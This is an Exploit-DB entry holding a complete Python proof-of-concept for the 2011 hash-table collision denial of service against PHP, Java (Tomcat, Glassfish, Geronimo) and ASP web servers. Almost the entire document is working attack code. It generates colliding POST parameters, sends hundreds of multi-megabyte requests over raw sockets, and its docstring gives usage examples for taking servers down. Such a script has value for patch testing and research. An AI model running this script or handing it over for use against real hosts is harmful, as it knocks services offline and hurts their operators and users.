PHP Hash Table Collision - Denial of Service (PoC)

EDB-ID:

18305




Platform:

PHP

Date:

2012-01-03


#!/usr/bin/env python

"""
This script was written by Christian Mehlmauer <FireFart@gmail.com>
https://twitter.com/#!/_FireFart_

Sourcecode online at:
https://github.com/FireFart/HashCollision-DOS-POC

Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision

http://www.ocert.org/advisories/ocert-2011-003.html
CVE:
Apache Geronimo: CVE-2011-5034
Oracle Glassfish: CVE-2011-5035
PHP: CVE-2011-4885
Apache Tomcat: CVE-2011-4858

requires Python 2.7

Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output -t PHP

-) Take down a PHP server(make 500 requests without waiting for a response):
python HashtablePOC.py -u https://host/index.php -v -c 500 -t PHP

-) Take down a JAVA server(make 500 requests without waiting for a response, maximum POST data size 2MB):
python HashtablePOC.py -u https://host/index.jsp -v -c 500 -t JAVA -m 2

Changelog:
v6.0: Added Javapayloadgenerator
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""

import socket
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools

class Payloadgenerator:
    # Maximum recursions when searching for collisionchars
    _recursivemax = 15
    _recursivecounter = 1
    
    def __init__(self, verbose, collisionchars = 5, collisioncharlength = 2, payloadlength = 8):
        self._verbose = verbose
        self._collisionchars = collisionchars
        self._collisioncharlength = collisioncharlength
        self._payloadlength = payloadlength
    
    def generateASPPayload(self):
        raise Exception("ASP Payload not implemented")
    
    def generateJAVAPayload(self):
        a = self._computeJAVACollisionChars(self._collisionchars)
        return self._generatePayload(a, self._payloadlength)
    
    def generatePHPPayload(self):
        # Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
        # compute entries with collisions in PHP hashtable hash function
        a = self._computePHPCollisionChars(self._collisionchars)
        return self._generatePayload(a, self._payloadlength);
    
    def _computePHPCollisionChars(self, count):
        charrange = range(0, 256)
        return self._computeCollisionChars(self._DJBX33A, count, charrange)
    
    def _computeJAVACollisionChars(self, count):
        charrange = range(0, 129)
        return self._computeCollisionChars(self._DJBX31A, count, charrange)
    
    def _computeCollisionChars(self, function, count, charrange):
        hashes = {}
        counter = 0
        length = self._collisioncharlength
        a = ""
        for i in charrange:
            a = a+chr(i)
        source = list(itertools.product(a, repeat=length))
        basestr = ''.join(random.choice(source))
        basehash = function(basestr)
        hashes[str(counter)] = basestr
        counter = counter + 1
        for item in source:
            tempstr = ''.join(item)
            if tempstr == basestr:
                continue
            if function(tempstr) == basehash:
                hashes[str(counter)] = tempstr
                counter = counter + 1
            if counter >= count:
                break;
        if counter < count:
            # Try it again
            if self._recursivecounter > self._recursivemax:
                print("Not enought values found. Please start this script again")
                sys.exit(1)
            print("%d: Not enough values found. Trying it again..." % self._recursivecounter)
            self._recursivecounter = self._recursivecounter + 1
            hashes = self._computeCollisionChars(function, count, charrange)
        else:
            if self._verbose:
                print("Found values:")
                for item in hashes:
                    tempstr = hashes[item]
                    print("\tValue: %s\tHash: %s" % (tempstr, function(tempstr)))
                    for i in tempstr:
                        print("\t\tValue: %s\tCharcode: %d" % (i, ord(i)))
        return hashes
    
    def _DJBXA(self, inputstring, base, start):
        counter = len(inputstring) - 1
        result = start
        for item in inputstring:
            result = result + (math.pow(base, counter) * ord(item))
            counter = counter - 1
        return int(round(result))
    
    #PHP
    def _DJBX33A(self, inputstring):
        return self._DJBXA(inputstring, 33, 5381)
    
    #Java
    def _DJBX31A(self, inputstring):
        return self._DJBXA(inputstring, 31, 0)
    
    #ASP
    def _DJBX33X(self, inputstring):
        counter = len(inputstring) - 1
        result = 5381
        for item in inputstring:
            result = result + (int(round(math.pow(33, counter))) ^ ord(item))
            counter = counter - 1
        return int(round(result))
    
    def _generatePayload(self, collisionchars, payloadlength):
        # Taken from:
        # https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
    
        # how long should the payload be
        length = payloadlength
        size = len(collisionchars)
        post = ""
        maxvaluefloat = math.pow(size,length)
        maxvalueint = int(math.floor(maxvaluefloat))
        for i in range (maxvalueint):
            inputstring = self._base_convert(i, size)
            result = inputstring.rjust(length, "0")
            for item in collisionchars:
                result = result.replace(str(item), collisionchars[item])
            post += urllib.urlencode({result:""}) + "&"
    
        return post;
    
    def _base_convert(self, num, base):
        fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
        alphabet = fullalphabet[:base]
        if (num == 0):
            return alphabet[0]
        arr = []
        base = len(alphabet)
        while num:
            rem = num % base
            num = num // base
            arr.append(alphabet[rem])
        arr.reverse()
        return "".join(arr)

def main():
    parser = argparse.ArgumentParser(description="Take down a remote Host via Hashcollisions", prog="Universal Hashcollision Exploit")
    parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
    parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
    parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
    parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
    parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
    parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
    parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
    parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
    parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB, Tomcat is 2MB", type=int)
    parser.add_argument("-g", "--generate", dest="generate", help="Only generate Payload and exit", default=False, action="store_true")
    parser.add_argument("--version", action="version", version="%(prog)s 6.0")

    options = parser.parse_args()
    
    if options.target == "PHP":
        if not options.maxpayloadsize or options.maxpayloadsize == 0:
            maxpayloadsize = 8
        else:
            maxpayloadsize = options.maxpayloadsize
    elif options.target == "ASP":
        if not options.maxpayloadsize or options.maxpayloadsize == 0:
            maxpayloadsize = 8
        else:
            maxpayloadsize = options.maxpayloadsize
    elif options.target == "JAVA":
        if not options.maxpayloadsize or options.maxpayloadsize == 0:
            maxpayloadsize = 2
        else:
            maxpayloadsize = options.maxpayloadsize
    else:
        print("Target %s not yet implemented" % options.target)
        sys.exit(1)

    url = urlparse.urlparse(options.url)

    if not url.scheme:
        print("Please provide a scheme to the URL(http://, https://,..")
        sys.exit(1)

    host = url.hostname
    path = url.path
    port = url.port
    if not port:
        if url.scheme == "https":
            port = 443
        elif url.scheme == "http":
            port = 80
        else:
            print("Unsupported Protocol %s" % url.scheme)
            sys.exit(1)
    if not path:
        path = "/"

    if not options.payload:
        print("Generating Payload...")
        
        # Number of colliding chars to find
        collisionchars = 5
        # Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)
        collisioncharlength = 2
        # Length of each parameter in the payload
        payloadlength = 8
        generator = Payloadgenerator(options.verbose, collisionchars, collisioncharlength, payloadlength)
        if options.target == "PHP":
            payload = generator.generatePHPPayload()
        elif options.target == "ASP":
            #payload = generateASPPayload()
            print("Target %s not yet implemented" % options.target)
            sys.exit(1)
        elif options.target == "JAVA":
            payload = generator.generateJAVAPayload()
        else:
            print("Target %s not yet implemented" % options.target)
            sys.exit(1)

        print("Payload generated")
    else:
        f = open(options.payload, "r")
        payload = f.read()
        f.close()
        print("Loaded Payload from %s" % options.payload)

    # trim to maximum payload size (in MB)
    maxinmb = maxpayloadsize*1024*1024
    payload = payload[:maxinmb]
    # remove last invalid(cut off) parameter
    position = payload.rfind("=&")
    payload = payload[:position+1]
    
    # Save payload
    if options.save:
        f = open(options.save, "w")
        f.write(payload)
        f.close()
        print("Payload saved to %s" % options.save)

    # User selected to only generate the payload
    if options.generate:
        return

    print("Host: %s" % host)
    print("Port: %s" % str(port))
    print("path: %s" % path)
    print
    print

    for i in range(options.count):
        print("sending Request #%s..." % str(i+1))
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if url.scheme == "https":
            ssl_sock = ssl.wrap_socket(sock)
            ssl_sock.connect((host, port))
            ssl_sock.settimeout(None)
        else:
            sock.connect((host, port))
            sock.settimeout(None)

        request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)

        if url.scheme == "https":
            ssl_sock.send(request)
        else:
            sock.send(request)

        if options.verbose:
            if len(request) > 400:
                print(request[:400]+"....")
            else:
                print(request)
            print("")
        if options.wait or options.output:
            start = time.time()
            if url.scheme == "https":
                data = ssl_sock.recv(1024)
                string = ""
                while len(data):
                    string = string + data
                    data = ssl_sock.recv(1024)
            else:
                data = sock.recv(1024)
                string = ""
                while len(data):
                    string = string + data
                    data = sock.recv(1024)
            
            elapsed = (time.time() - start)
            print("Request %s finished" % str(i+1))
            print("Request %s duration: %s" % (str(i+1), elapsed))
            split = string.partition("\r\n\r\n")
            header = split[0]
            content = split[2]
            if options.verbose:
                # only print http header
                print("")
                print(header)
                print("")
            if options.output:
                f = open(options.output+str(i)+".html", "w")
                f.write("<!-- "+header+" -->\r\n"+content)
                f.close()

        if url.scheme == "https":
            ssl_sock.close()
            sock.close()
        else:
            sock.close()

if __name__ == "__main__":
    main()